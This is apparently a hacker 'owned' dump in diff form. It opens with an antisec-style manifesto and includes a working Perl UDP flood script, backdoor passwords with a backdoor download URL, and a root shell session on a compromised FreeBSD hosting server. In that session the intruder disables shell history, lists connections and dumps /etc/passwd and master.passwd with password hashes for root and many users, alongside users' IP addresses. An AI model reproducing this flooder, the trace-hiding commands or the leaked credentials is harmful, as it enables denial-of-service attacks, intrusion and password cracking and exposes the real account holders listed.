+ref: http://www.webhostingtalk.com/showthread.php?p=6175336#post6175336 + + + +romeo@mercedes~$ // romeo.copyandpaste.info + + +
+
+                 __   .__                        
+_____     ____ _/  |_ |__|  ______  ____   ____  
+\__  \   /    \\   __\|  | /  ___/_/ __ \_/ ___\ 
+ / __ \_|   |  \|  |  |  | \___ \ \  ___/\  \___ 
+(____  /|___|  /|__|  |__|/____  > \___  >\___  >
+     \/      \/ # rm -rf /     \/      \/     \/Movement
+ 
+						~ Fuck full-disclosure
+                                                ~ Fuck the security industry
+						~ Keep 0days private
+						~ Hack everyone you can and then hack some more
+ 
+
+
+http://i43.tinypic.com/21317c6.png // [root@mercedes ~]# 
+
+/* It is clear that you and RoMeO was sharing the same hr-dev server with the following domains:
+
+evilzone.ws
+h4ckinab0x.com
+hr-development.net
+phone.addresses.com
+phone.theyellowpages.com
+aaasoda.com
+beyond-comparison.com
+hotglowneon.com
+yourkicksonline.com
+yourkicksonline.net
+blitzcraze.com
+blitzdownloads.com
+bloohacks.com
+bootforfun.com
+crypticgamers.com
+crypticgamers.net
+darkmindz.com
+furiogaming.net
+godlymods.com
+h3mod.com
+h4ckinab0x.com
+hackordie.net
+halostrike.com
+iexpl0it.net
+mods4hire.com
+mortonnetworks.com
+oinfam0uso.com
+pagewizzstudio.com
+phylumstudios.com
+samcraft.com
+scionbot.com
+snayke.com
+softmodding.net
+teamunix.org
+theconsolejunkies.com
+undergr0undhackers.com
+vbcoderz.com
+1nesolution.com
+bootforfun.com
+crypticgamers.net
+cybershade.org
+darkmindz.com
+furiogaming.com
+gotmovies.net
+h3mod.com
+halostrike.com
+keytraderz.com
+samcraft.com
+sounddistrict.com
+theconsolejunkies.com
+
+*/
+
+
+
+#!/usr/bin/perl
+# udp
+#flooder.pl coded by pimpinjg
+
+print q{
+====================================================                                                                             
+=						   =
+=                                        Coded By  =
+=                                                  =
+=                                       pimpinjg   =
+=                                                  =
+=                                team  h4ckinab0x  =
+=                                                  =
+=                                h4ckinab0x.com    =
+=                                                  =
+====================================================
+};
+
+use io::socket;
+
+print "Host: ";
+chop ($host = );
+print "Port: ";
+chop ($port = );
+
+{
+$sock = IO::Socket::INET->new (
+                PeerAddr => $host,
+                PeerPort => $port,
+                Proto => 'udp') || die "$! Make sure the IP/host or port number is correct";
+}
+packets:
+while (1) {
+$size = rand() * 200 * 2000;
+print ("$host:$port packet size: $size\n");
+send($sock, 0, $size);
+}
+
+ref: http://www.studentshangout.com/topic/99723-udp-flodder/
+
+// anti-ddos specialist @ hr-dev.. 
+
+
+_______         _______  ________  
+\   _  \ ___  __\   _  \ \_____  \ 
+/  /_\  \\  \/  /  /_\  \  _(__  < 
+\  \_/   \>    <\  \_/   \/       \
+ \_____  /__/\_ \\_____  /______  /
+       \/      \/      \/       \/ 
+                                                            __             
+  ______  _  ______ _____     ____   ____      ____   _____/  |_           
+ /  _ \ \/ \/ /    \\__  \   / ___\_/ __ \    /    \_/ __ \   __\   ______ 
+(  <_> )     /   |  \/ __ \_/ /_/  >  ___/   |   |  \  ___/|  |    /_____/ 
+ \____/ \/\_/|___|  (____  /\___  / \___  > /\___|  /\___  >__|            
+                  \/     \//_____/      \/  \/    \/     \/                
+__________                _________              
+\______   \_______  ____ /   _____/ ____   ____  
+ |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
+ |    |     |  | \(  <_> )        \  ___/\  \___ 
+ |____|     |__|   \____/_______  /\___  >\___  >
+                                \/     \/     \/ 
+
+
+
+/* 
+Random Backdoor Passwords: Sk3rhGLdYW, 0x3a0wnt, RAzDX1lFd8
+Backdoor http://board.whois.co.kr/lol.tar.gz (malloc is your enemy)
+*/
+
+This is a private computer system which is restricted to authorized individuals.
+Actual or attempted unauthorized use of this computer system will result in criminal
+and/or civil prosecution.  This system is owned by Vitalspeeds Corporation of Wisconsin.
+To purchase an account please visit us at http://www.vitalspeeds.com.
+
+FreeBSD 6.2-RELEASE-p3 (VITAL) #0: Sun Apr 15 19:59:55 PDT 2007
+
+
+                              Welcome
+                                to
+  ___ ___ __ __          __                             __
+ |   |   |__|  |_.---.-.|  |.-----.-----.-----.-----.--|  |.-----.
+ |   |   |  |   _|  _  ||  ||__ --|  _  |  -__|  -__|  _  ||__ --|
+  \_____/|__|____|___._||__||_____|   __|_____|_____|_____||_____|
+                                  |__|
+
+
+
+ By entering or accessing this server, you hereby agree to the Acceptable
+      Use Policy and any other terms and conditions listed on our website.
+
+     Type 'vhosts' for a list of the virtual hosts that can be used on
+           this system. You can view this again by typing 'motd'.
+
+               Support can be obtained in #vitalspeeds on EFnet.
+
+                       http://www.vitalspeeds.com/
+
+
+Perm - All support requests should go through our Ticket system @
+https://billing.vitalspeeds.com or IRC@EFnet #Vitalspeeds .
+
+Commands: vhosts, BitchX
+NOTE: Eggdrop/BNCS use ports over 35000.
+
+April 12 2007 : Hard drive failure, all data is gone as we do not keep backups of shell accounts as per the terms of 
+service. Check your welcome email for user info etc. 
+
+                +----------------------------[ Owned ]----------------------------+
+                |          Hack everyone you can and then hack some more          | // romeo.copyandpaste.info
+                |                           Owned[DC] v2                          |
+                |                   _______ . _______ . _______                   |
+                |             Get in as anonymous, Leave with no trace.           |
+                |                                                                 |
+                +-----------------------------------------------------------------+
+         [ FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 i386 ]
+
+ 6:30PM  up 518 days,  6:58, 2 users, load averages: 0.33, 0.26, 0.24
+yaquis           ttyp1    ip72-223-92-235. Sun Jun 28 18:12   still logged in
+yaquis           ttyp1    ip72-223-92-235. Sun Jun 28 17:00 - 17:39  (00:38)
+katsst           ttyp1    cpe-75-84-149-5. Sun Jun 28 16:07 - 16:37  (00:30)
+dark             ftp      modemcable089.1  Sun Jun 28 15:45 - 15:45  (00:00)
+smash            ttyp1    89.30.147.8      Sun Jun 28 15:30 - 15:50  (00:19)
+[root@velocity:~]# w
+ 6:30PM  up 518 days,  6:58, 2 users, load averages: 0.43, 0.28, 0.25
+USER             TTY      FROM              LOGIN@  IDLE WHAT
+romeo            p0       :ttyp2:S.0       Thu11PM     - irssi -h absolute.ownage.net
+yaquis           p1       ip72-223-92-235.  6:12PM     - -bash (bash)
+
+
+[root@velocity:~]# export HISTSIZE=0
+[root@velocity:~]# export HISTFILE=/dev/null
+[root@velocity:~]# env
+TERM=vt100
+SHELL=/usr/local/bin/bash
+HISTSIZE=1500
+SSH_CLIENT=1.3.3.7 6173 22
+SSH_TTY=/dev/ttyp1
+USER=root
+SSH_AUTH_SOCK=/tmp/ssh-M0YqjqZvAN/agent.70342
+PAGER=more
+LSCOLORS=ExGxFxf5CxfgDxabagacad
+MAIL=/var/mail/root
+PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/X11R6/bin
+PWD=/root
+EDITOR=pico
+PS1=[\u@\h:\w]\$ 
+SHLVL=1
+HOME=/root
+LOGNAME=root
+SSH_CONNECTION=1.3.3.7 6173 72.20.28.205 22
+HISTFILE=/dev/null
+_=/usr/bin/env
+[root@velocity:~]# w
+ 7:36PM  up 513 days,  8:04, 2 users, load averages: 0.43, 0.48, 0.43
+USER             TTY      FROM              LOGIN@  IDLE WHAT
+romeo            p9       :ttypf:S.0       Wed06AM     1 irssi -h absolute.ownage.net
+pimpinjg         pe       cpe-76-175-20-18 Mon09PM  1:15 irssi -h 72.20.28.206 // points to copyandpaste.info
+[root@velocity:/]# date
+Tue Jun 23 20:30:52 CDT 2009
+[root@velocity:/]# uname -a
+FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #0: Sun Apr 15 19:59:55 PDT 2007     root@velocity.vitalspeeds.com:/usr/obj/usr/src/sys/VITAL  i386
+
+[root@velocity:~]# sysctl -a | egrep -i 'hw.machine|hw.model|hw.ncpu'
+hw.machine: i386
+hw.model: Intel(R) Pentium(R) 4 CPU 2.80GHz
+hw.ncpu: 1
+hw.machine_arch: i386
+
+
+[root@velocity:~]# ls -la
+total 72
+drwxr-xr-x   6 root  wheel   512 Jun 26 02:08 ./
+drwxr-xr-x  21 root  wheel   512 Nov  5  2008 ../
+-rw-------   1 root  wheel  4356 Jun 11 08:02 .bash_history
+-rw-r--r--   2 root  wheel   801 Jan 12  2007 .cshrc
+-rw-------   1 root  wheel     5 Apr 15  2007 .history
+drwx------   2 root  wheel   512 Jun 11 10:25 .irssi/
+-rw-r--r--   1 root  wheel   143 Jan 12  2007 .k5login
+-rw-------   1 root  wheel    35 Jun 25 16:35 .lesshst
+-rw-r--r--   1 root  wheel   293 Jan 12  2007 .login
+-rw-------   1 root  wheel  2164 Jun 23 20:21 .lsof_velocity
+-rw-r--r--   2 root  wheel   251 Jan 12  2007 .profile
+drwx------   2 root  wheel   512 Apr 13  2007 .ssh/
+drwxr-xr-x   2 root  wheel   512 Jun 24 18:00 kernels/
+drwxr-xr-x   2 root  wheel   512 Nov  5  2008 supfiles/
+-rwxr--r--   1 root  wheel   477 Nov  5  2008 update.sh*
+
+[root@velocity:~]# lsof -i -n | grep ssh
+sshd      43929      devil    3u  IPv4 0xca224000      0t0  TCP *:search (LISTEN)
+sshd      43929      devil    5u  IPv6 0xca6b5cb0      0t0  TCP *:search (LISTEN)
+sshd      43929      devil    7u  IPv4 0xca0653a0      0t0  TCP 72.20.3.98:search->189.158.227.97:1036 (ESTABLISHED)
+sshd      43929      devil   87u  IPv4 0xcafd2570      0t0  TCP 72.20.28.196:51129->69.16.172.40:afs3-fileserver (ESTABLISHED)
+sshd      43929      devil  154u  IPv4 0xc98913a0      0t0  TCP 72.20.28.210:52054->82.196.213.250:ircd (ESTABLISHED)
+sshd      43929      devil  167u  IPv4 0xcc5a73a0      0t0  TCP 72.20.28.196:49651->84.208.29.17:afs3-fileserver (ESTABLISHED)
+sshd      43929      devil  192u  IPv4 0xcb023910      0t0  TCP 72.20.28.196:50866->69.16.172.34:afs3-fileserver (ESTABLISHED)
+sshd      60220       root    3u  IPv4 0xc92c9000      0t0  TCP 72.20.28.248:ssh->188.52.81.126:10662 (ESTABLISHED) // RoMeO Saudi Arabia
+sshd      60382       root    3u  IPv4 0xc50a51d0      0t0  TCP 72.20.28.248:ssh->188.52.81.126:10696 (ESTABLISHED)
+sshd      64492       root    3u  IPv6 0xcc1883a0      0t0  TCP *:ssh (LISTEN)
+sshd      64492       root    4u  IPv4 0xc970d3a0      0t0  TCP *:ssh (LISTEN)
+sshd      74777       root    3u  IPv4 0xc9dd8570      0t0  TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
+sshd      74779     ioplex    3u  IPv4 0xc9dd8570      0t0  TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
+sshd      74779     ioplex    7u  IPv4 0xc9f58cb0      0t0  TCP 127.0.0.1:56073->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex    8u  IPv4 0xc91ff1d0      0t0  TCP 127.0.0.1:57500->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex    9u  IPv4 0xc6230910      0t0  TCP 127.0.0.1:64660->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   10u  IPv4 0xc9a37ae0      0t0  TCP 127.0.0.1:49761->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   12u  IPv4 0xc9a93740      0t0  TCP 127.0.0.1:64920->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   13u  IPv4 0xc97d21d0      0t0  TCP 127.0.0.1:52350->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   14u  IPv4 0xc5c30000      0t0  TCP 127.0.0.1:51650->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   15u  IPv4 0xca1cf1d0      0t0  TCP 127.0.0.1:49153->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   16u  IPv4 0xcc1731d0      0t0  TCP 127.0.0.1:51808->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   17u  IPv4 0xcc592cb0      0t0  TCP 127.0.0.1:53451->127.0.0.1:48259 (ESTABLISHED)
+[root@velocity:~]# 
+
+[root@velocity:/var/run]# cat /etc/passwd 
+# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
+#
+root:*:0:0:Charlie &:/root:/usr/local/bin/bash
+toor:*:0:0:Bourne-again Superuser:/root:
+daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
+operator:*:2:5:System &:/:/usr/sbin/nologin
+bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
+tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
+kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
+games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
+news:*:8:8:News Subsystem:/:/usr/sbin/nologin
+man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
+sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
+smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
+mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
+bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
+proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
+_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
+_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
+uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
+pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
+www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
+nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
+nsc:*:1001:0:User &:/home/nsc:/bin/sh
+sysc:*:1002:1002:User &:/home/sysc:/usr/local/bin/bash
+vividbreeze:*:1003:1003:User &:/home/vividbreeze:/usr/local/bin/bash
+sharpie:*:1036:1036:User &:/home/sharpie:/usr/local/bin/bash
+cappy57:*:1038:1038:User &:/home/cappy57:/usr/local/bin/bash
+zoo:*:1039:1039:User &:/home/zoo:/usr/local/bin/bash
+dark:*:1041:1041:User &:/home/dark:/usr/local/bin/bash
+evino:*:1042:1042:User &:/home/evino:/usr/local/bin/bash
+dano30:*:1043:1043:User &:/home/dano30:/usr/local/bin/bash
+daali:*:1044:1044:User &:/home/daali:/usr/local/bin/bash
+skit:*:1045:1045:User &:/home/skit:/usr/local/bin/bash
+l33t:*:1047:1047:User &:/home/l33t:/usr/local/bin/bash
+tlm:*:1049:1049:User &:/home/tlm:/usr/local/bin/bash
+itzkorn:*:1051:1051:User &:/home/itzkorn:/usr/local/bin/bash
+groove:*:1052:1052:User &:/home/groove:/usr/local/bin/bash
+en0prcv:*:1054:1054:User &:/home/en0prcv:/usr/local/bin/bash
+poolboy:*:1055:1055:User &:/home/poolboy:/usr/local/bin/bash
+bollox:*:1058:1058:User &:/home/bollox:/usr/local/bin/bash
+vamp:*:1059:1059:User &:/home/vamp:/usr/local/bin/bash
+genosyde:*:1060:1060:User &:/home/genosyde:/usr/local/bin/bash
+y2j:*:1061:1061:User &:/home/y2j:/usr/local/bin/bash
+katsst:*:1062:1062:User &:/home/katsst:/usr/local/bin/bash
+nexxtea:*:1063:1063:User &:/home/nexxtea:/usr/local/bin/bash
+quinn:*:1064:1064:User &:/home/quinn:/usr/local/bin/bash
+crash:*:1066:1066:User &:/home/crash:/usr/local/bin/bash
+safety:*:1067:1067:User &:/home/safety:/usr/local/bin/bash
+crazyl:*:1069:1069:User &:/home/crazyl:/usr/local/bin/bash
+tarawa:*:1071:1071:User &:/home/tarawa:/usr/local/bin/bash
+athemp:*:1077:1077:User &:/home/athemp:/usr/local/bin/bash
+cazz1961:*:1087:1087:User &:/home/cazz1961:/usr/local/bin/bash
+vitalrbj:*:1088:1088:User &:/home/vitalrbj:/usr/local/bin/bash
+digitalman:*:1090:1090:User &:/home/digitalman:/usr/local/bin/bash
+timgor:*:1096:1096:User &:/home/timgor:/usr/local/bin/bash
+techi3:*:1098:1098:User &:/home/techi3:/usr/local/bin/bash
+apo:*:1099:1099:User &:/home/apo:/usr/local/bin/bash
+blkgraz:*:1100:1100:User &:/home/blkgraz:/usr/local/bin/bash
+jamesn:*:1101:1101:User &:/home/jamesn:/usr/local/bin/bash
+sacred:*:1103:1103:User &:/home/sacred:/usr/local/bin/bash
+jschultk:*:1104:1104:User &:/home/jschultk:/usr/local/bin/bash
+narcissu:*:1105:1105:User &:/home/narcissu:/usr/local/bin/bash
+neohax:*:1115:1115:User &:/home/neohax:/usr/local/bin/bash
+ceejay:*:1119:1119:User &:/home/ceejay:/usr/local/bin/bash
+wolf:*:1126:1126:User &:/home/wolf:/usr/local/bin/bash
+warlordz:*:1129:1129:User &:/home/warlordz:/usr/local/bin/bash
+hh360:*:1130:1130:User &:/home/hh360:/usr/local/bin/bash
+simonbh:*:1133:1133:User &:/home/simonbh:/usr/local/bin/bash
+crazie:*:1134:1134:User &:/home/crazie:/bin/tcsh
+burnt:*:1136:1136:User &:/home/burnt:/usr/local/bin/bash
+xckx:*:1139:1139:User &:/home/xckx:/bin/sh
+f3d0r:*:1140:1140:User &:/home/f3d0r:/usr/local/bin/bash
+khicks:*:1145:1145:User &:/home/khicks:/usr/local/bin/bash
+schlomer:*:1147:1147:User &:/home/schlomer:/usr/local/bin/bash
+nodex:*:1153:1153:User &:/home/nodex:/usr/local/bin/bash
+crrj13:*:1155:1155:User &:/home/crrj13:/usr/local/bin/bash
+dravas:*:1157:1157:User &:/home/dravas:/usr/local/bin/bash
+sinistro:*:1170:1170:User &:/home/sinistro:/usr/local/bin/bash
+izedd:*:1172:1172:User &:/home/izedd:/usr/local/bin/bash
+chevym4n:*:1174:1174:User &:/home/chevym4n:/usr/local/bin/bash
+edgein:*:1175:1175:User &:/home/edgein:/usr/local/bin/bash
+shoes:*:1178:1178:User &:/home/shoes:/usr/local/bin/bash
+zenchi:*:1179:1179:User &:/home/zenchi:/usr/local/bin/bash
+darien9:*:1180:1180:User &:/home/darien9:/usr/local/bin/bash
+reaper90:*:1181:1181:User &:/home/reaper90:/usr/local/bin/bash
+bnoel:*:1183:1183:User &:/home/bnoel:/usr/local/bin/bash
+hts:*:1188:1188:User &:/home/hts:/usr/local/bin/bash
+hw4tbnc:*:1190:1190:User &:/home/hw4tbnc:/usr/local/bin/bash
+xavi:*:1192:1192:User &:/home/xavi:/usr/local/bin/bash
+kruapra:*:1193:1193:User &:/home/kruapra:/usr/local/bin/bash
+bbblade1:*:1197:1197:User &:/home/bbblade1:/usr/local/bin/bash
+oby1:*:1198:1198:User &:/home/oby1:/usr/local/bin/bash
+ltootle:*:1199:1199:User &:/home/ltootle:/usr/local/bin/bash
+zime:*:1200:1200:User &:/home/zime:/usr/local/bin/bash
+ksafusi:*:1202:1202:User &:/home/ksafusi:/usr/local/bin/bash
+methanl:*:1205:1205:User &:/home/methanl:/usr/local/bin/bash
+anux:*:1206:1206:User &:/home/anux:/usr/local/bin/bash
+tea:*:1207:1207:User &:/home/tea:/usr/local/bin/bash
+ircjaymz:*:1210:1210:User &:/home/ircjaymz:/usr/local/bin/bash
+coolcat:*:1211:1211:User &:/home/coolcat:/usr/local/bin/bash
+zeepysea:*:1213:1213:User &:/home/zeepysea:/usr/local/bin/bash
+darkevil:*:1214:1214:User &:/home/darkevil:/usr/local/bin/bash
+grindey:*:1215:1215:User &:/home/grindey:/usr/local/bin/bash
+silver15:*:1216:1216:User &:/home/silver15:/usr/local/bin/bash
+smash:*:1218:1218:User &:/home/smash:/usr/local/bin/bash
+reznik:*:1219:1219:User &:/home/reznik:/usr/local/bin/bash
+omelette:*:1222:1222:User &:/home/omelette:/usr/local/bin/bash
+mimik0r:*:1223:1223:User &:/home/mimik0r:/usr/local/bin/bash
+owine:*:1224:1224:User &:/home/owine:/usr/local/bin/bash
+manboo:*:1225:1225:User &:/home/manboo:/usr/local/bin/bash
+corley:*:1231:1231:User &:/home/corley:/usr/local/bin/bash
+sqd:*:1233:1233:User &:/home/sqd:/usr/local/bin/bash
+mooo:*:1234:1234:User &:/home/mooo:/usr/local/bin/bash
+comedy:*:1235:1235:User &:/home/comedy:/usr/local/bin/bash
+lynx:*:1236:1236:User &:/home/lynx:/usr/local/bin/bash
+prodigy:*:1237:1237:User &:/home/prodigy:/usr/local/bin/bash
+chrirc:*:1238:1238:User &:/home/chrirc:/usr/local/bin/bash
+lyhne1:*:1242:1242:User &:/home/lyhne1:/usr/local/bin/bash
+percott1:*:1243:1243:User &:/home/percott1:/usr/local/bin/bash
+djspark:*:1244:1244:User &:/home/djspark:/usr/local/bin/bash
+ac1115:*:1246:1246:User &:/home/ac1115:/usr/local/bin/bash
+asriel:*:1247:1247:User &:/home/asriel:/usr/local/bin/bash
+devil:*:1248:1248:User &:/home/devil:/usr/local/bin/bash
+lymelyte:*:1249:1249:User &:/home/lymelyte:/usr/local/bin/bash
+cmm:*:1250:1250:User &:/home/cmm:/usr/local/bin/bash
+nek0o:*:1252:1252:User &:/home/nek0o:/usr/local/bin/bash
+baxxta:*:1253:1253:User &:/home/baxxta:/usr/local/bin/bash
+bruhaha:*:1254:1254:User &:/home/bruhaha:/usr/local/bin/bash
+dv327:*:1258:1258:User &:/home/dv327:/usr/local/bin/bash
+voxitize:*:1261:1261:User &:/home/voxitize:/usr/local/bin/bash
+own3d:*:1262:1262:User &:/home/own3d:/usr/local/bin/bash
+feed:*:1264:1264:User &:/home/feed:/usr/local/bin/bash
+yaquis:*:1266:1266:User &:/home/yaquis:/usr/local/bin/bash
+bpunux:*:1269:1269:User &:/home/bpunux:/usr/local/bin/bash
+skypilot:*:1271:1271:User &:/home/skypilot:/usr/local/bin/bash
+blake96:*:1272:1272:User &:/home/blake96:/usr/local/bin/bash
+blotch:*:1274:1274:User &:/home/blotch:/usr/local/bin/bash
+scouse:*:1275:1275:User &:/home/scouse:/usr/local/bin/bash
+mogle3:*:1276:1276:User &:/home/mogle3:/usr/local/bin/bash
+ste:*:1277:1277:User &:/home/ste:/usr/local/bin/bash
+omgwtf:*:1281:1281:User &:/home/omgwtf:/usr/local/bin/bash
+brosb4:*:1283:1283:User &:/home/brosb4:/usr/local/bin/bash
+mindben:*:1284:1284:User &:/home/mindben:/usr/local/bin/bash
+hixk:*:1286:1286:User &:/home/hixk:/usr/local/bin/bash
+omen:*:1287:1287:User &:/home/omen:/usr/local/bin/bash
+sakik1:*:1290:1290:User &:/home/sakik1:/usr/local/bin/bash
+chriys:*:1291:1291:User &:/home/chriys:/usr/local/bin/bash
+jtracy:*:1292:1292:User &:/home/jtracy:/usr/local/bin/bash
+roodyk:*:1293:1293:User &:/home/roodyk:/usr/local/bin/bash
+qfx:*:1295:1295:User &:/home/qfx:/usr/local/bin/bash
+chrisdad:*:1296:1296:User &:/home/chrisdad:/usr/local/bin/bash
+rice21:*:1298:1298:User &:/home/rice21:/usr/local/bin/bash
+wchan21:*:1299:1299:User &:/home/wchan21:/usr/local/bin/bash
+xkelsx:*:1300:1300:User &:/home/xkelsx:/usr/local/bin/bash
+jerryste:*:1302:1302:User &:/home/jerryste:/usr/local/bin/bash
+pbx:*:1303:1303:User &:/home/pbx:/usr/local/bin/bash
+mlh:*:1307:1307:User &:/home/mlh:/usr/local/bin/bash
+howell1:*:1308:1308:User &:/home/howell1:/usr/local/bin/bash
+djkarl:*:1309:1309:User &:/home/djkarl:/usr/local/bin/bash
+subkult:*:1310:1310:User &:/home/subkult:/usr/local/bin/bash
+dealer:*:1311:1311:User &:/home/dealer:/bin/sh
+cont:*:1312:1312:User &:/home/cont:/usr/local/bin/bash
+ircusr:*:1313:1313:User &:/home/ircusr:/usr/local/bin/bash
+lordy:*:1314:1314:User &:/home/lordy:/usr/local/bin/bash
+chozen1:*:1315:1315:User &:/home/chozen1:/usr/local/bin/bash
+nardi:*:1316:1316:User &:/home/nardi:/usr/local/bin/bash
+ssaws:*:1317:1317:User &:/home/ssaws:/usr/local/bin/bash
+chaos1:*:1318:1318:User &:/home/chaos1:/usr/local/bin/bash
+jax66:*:1319:1319:User &:/home/jax66:/usr/local/bin/bash
+paleride:*:1320:1320:User &:/home/paleride:/usr/local/bin/bash
+kokoryu:*:1321:1321:User &:/home/kokoryu:/usr/local/bin/bash
+bluewish:*:1322:1322:User &:/home/bluewish:/usr/local/bin/bash
+grumpy:*:1323:1323:User &:/home/grumpy:/usr/local/bin/bash
+jaiven:*:1324:1324:jusam69:/home/jaiven:/usr/local/bin/bash
+rikt:*:1325:1325:User &:/home/rikt:/usr/local/bin/bash
+sal:*:1326:1326:User &:/home/sal:/usr/local/bin/bash
+lailoke:*:1327:1327:User &:/home/lailoke:/usr/local/bin/bash
+kingzy:*:1328:1328:User &:/home/kingzy:/usr/local/bin/bash
+delion1:*:1329:1329:User &:/home/delion1:/usr/local/bin/bash
+vietnigh:*:1330:1330:User &:/home/vietnigh:/usr/local/bin/bash
+darkuno3:*:1331:1331:User &:/home/darkuno3:/usr/local/bin/bash
+mae21:*:1332:1332:User &:/home/mae21:/usr/local/bin/bash
+redrum:*:1333:1333:User &:/home/redrum:/usr/local/bin/bash
+cpu:*:1334:1334:User &:/home/cpu:/usr/local/bin/bash
+cassand:*:1335:1335:User &:/home/cassand:/usr/local/bin/bash
+nyakz:*:1336:1336:User &:/home/nyakz:/usr/local/bin/bash
+ioplex:*:1337:1337:User &:/home/ioplex:/usr/local/bin/bash
+dasboot:*:1338:1338:User &:/home/dasboot:/usr/local/bin/bash
+visage:*:1339:1339:User &:/home/visage:/usr/local/bin/bash
+brosco:*:1340:1340:User &:/home/brosco:/usr/local/bin/bash
+mrts:*:1341:1341:User &:/home/mrts:/usr/local/bin/bash
+qberto:*:1342:1342:User &:/home/qberto:/usr/local/bin/bash
+kooner:*:1343:1343:User &:/home/kooner:/usr/local/bin/bash
+matt:*:1344:1344:User &:/home/matt:/usr/local/bin/bash
+alexbb:*:1345:1345:User &:/home/alexbb:/usr/local/bin/bash
+psycoz:*:1346:1346:User &:/home/psycoz:/usr/local/bin/bash
+brex132:*:1347:1347:User &:/home/brex132:/usr/local/bin/bash
+romeo:*:1348:1348:User &:/home/romeo:/usr/local/bin/bash 	// Luv birdz
+pimpinjg:*:1349:1349:pimp:/home/pimpinjg:/usr/local/bin/bash	      xxx
+
+[root@velocity:/var/run]# cat /etc/master.passwd 
+# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
+#
+root:$1$1/uC7r58$sAPSn.PUGsvyFIu4mcOIF.:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
+toor:$1$IuvLkk7/$FgGjVLe5lsy07I5kDUC/T0:0:0::0:0:Bourne-again Superuser:/root:
+daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
+operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
+bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
+tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
+kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
+games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
+news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
+man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
+sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
+smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
+mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
+bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
+proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
+_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
+_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
+uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
+pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
+www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
+nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
+nsc:$1$IeIWCi46$XUYbzB6VMUjyo3yVDocI20:1001:0::0:0:User &:/home/nsc:/bin/sh
+sysc:$1$hiSG4Zk5$DRLSxZFui5GLPwdZoHRXa/:1002:1002::0:0:User &:/home/sysc:/usr/local/bin/bash
+vividbreeze:$1$HHTt39fS$BpffLFLjdrdFhiYRiT/oH1:1003:1003::0:0:User &:/home/vividbreeze:/usr/local/bin/bash
+sharpie:$1$Z/fby1iX$U.ENzMwNSk.Ak1eEo8cdo1:1036:1036::0:0:User &:/home/sharpie:/usr/local/bin/bash
+cappy57:$1$8gQtMpSY$4g39UeywbkYfv4t.BC1T0.:1038:1038::0:0:User &:/home/cappy57:/usr/local/bin/bash
+zoo:$1$ikC.1RVM$vaW3geI2tKDiBuvM7/8H1/:1039:1039::0:0:User &:/home/zoo:/usr/local/bin/bash
+dark:$1$sGGpg4L4$HYL2DV2DDtJrlDCsIk1fD0:1041:1041::0:0:User &:/home/dark:/usr/local/bin/bash
+evino:$1$HDrVvLQn$D1cJvyXZzYWc71dnlB9jl.:1042:1042::0:0:User &:/home/evino:/usr/local/bin/bash
+dano30:$1$ilxeqeAX$1.xdaXswIvjWdH4Es8U1U1:1043:1043::0:0:User &:/home/dano30:/usr/local/bin/bash
